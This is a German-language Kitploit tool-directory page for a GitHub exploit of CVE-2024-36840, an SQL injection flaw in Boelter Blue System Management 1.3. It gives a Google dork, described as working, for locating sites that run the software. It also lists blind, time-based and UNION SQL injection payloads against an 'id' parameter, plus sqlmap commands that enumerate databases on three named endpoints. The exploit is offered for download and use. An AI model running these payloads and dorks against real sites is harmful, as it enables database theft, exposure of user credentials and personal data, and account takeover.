Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-36840-Exploit — # Exploit für: CVE-2024-36840: SQL-Injection-Schwachstelle im Boelter Blue System Management (Version 1.3) | Kitploit
Tools/GitHubGitHub/theexploiters/cve-2024-36840-exploit
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHubtheexploiters/cve-2024-36840-exploit

CVE-2024-36840-Exploit

# Exploit für: CVE-2024-36840: SQL-Injection-Schwachstelle im Boelter Blue System Management (Version 1.3)

Repository anzeigen
218vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-36840: SQL-Injection-Schwachstelle in Boelter Blue System Management (Version 1.3)

Exploit-Details

  • Exploit-Titel: SQL-Injection-Schwachstelle in Boelter Blue System Management (Version 1.3)

  • Originaler Google Dork: inurl:"Powered by Boelter Blue" (funktionierte nicht (null URLs in der Suche))

  • Google Dork von Theexploiters: intext:"Powered by Boelter Blue" (funktioniert)

  • Datum: 2024-06-04

  • Exploit-Autor: CBKB (DeadlyData, R4d1x)

  • Hersteller-Website: Boelter Blue

  • Software-Link: Google Play Store

  • Version: 1.3

  • Getestet auf: Linux Debian 9 (stretch), Apache 2.4.25, MySQL >= 5.0.12

  • CVE: CVE-2024-36840

Beschreibung der Schwachstelle

Mehrere SQL-Injection-Schwachstellen wurden in Boelter Blue System Management (Version 1.3) identifiziert. Diese Schwachstellen ermöglichen es Angreifern, beliebige SQL-Befehle über verschiedene Parameter zu injizieren und auszuführen. Eine erfolgreiche Ausnutzung kann zu unbefugtem Zugriff, Datenextraktion und potenzieller Übernahme von Konten führen.

Betroffene Parameter und Exploit-Details:

  1. Parameter: id (GET)

    • Typ: Boolesche blinde SQL-Injection
    • Payload: id=10071 AND 4036=4036
  2. Typ: Zeitbasierte blinde SQL-Injection

    • Payload: id=10071 AND (SELECT 4443 FROM (SELECT(SLEEP(5)))LjOd)
  3. Typ: UNION-Query

    • Payload: id=-5819 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7170766b71,0x646655514b72686177544968656d6e414e4678595a666f77447a57515750476751524f5941496b55,0x7162626a71),NULL,...

Verwundbare Endpunkte

  1. news_details.php?id

    • Beispiel: https://www.example.com/news_details.php?id=10071
    • Ausnutzung:
      root@kitploit:~
      sqlmap -u "https://www.example.com/news_details.php?id=10071" --random-agent --dbms=mysql --threads=4 --dbs
      
  2. services.php?section

    • Beispiel: https://www.example.com/services.php?section=5081
    • Ausnutzung:
      root@kitploit:~
      sqlmap -u "https://www.example.com/services.php?section=5081" --random-agent --tamper=space2comment --threads=8 --dbs
      
  3. location_details.php?id

    • Beispiel: https://www.example.com/location_details.php?id=836
    • Ausnutzung:
      root@kitploit:~
      sqlmap -u "https://www.example.com/location_details.php?id=836" --random-agent --dbms=mysql --dbs
      

Auswirkungen

  • Unbefugter Datenbankzugriff: Die Ausnutzung kann zu unbefugtem Zugriff auf die Datenbank führen und es Angreifern ermöglichen, vertrauliche Informationen zu extrahieren.
  • Datenlecks: Vertrauliche Daten wie Administrator-Anmeldedaten, personenbezogene Daten von Benutzern und Kaufverlauf können kompromittiert werden.
  • Kontoübernahmen: Angreifer können potenziell Benutzerkonten übernehmen.
  • Volle Kontrolle: Es kann die volle Kontrolle über die betroffene Anwendung erlangt werden, was zu schwerwiegenden Sicherheitsauswirkungen führt.

Credits

  • Entdecker: CBKB (DeadlyData, R4d1x)

Referenzen

  • CyberDepot Vulnerability Report
  • CVE-2024-36840

Repo View Counter

Tool herunterladen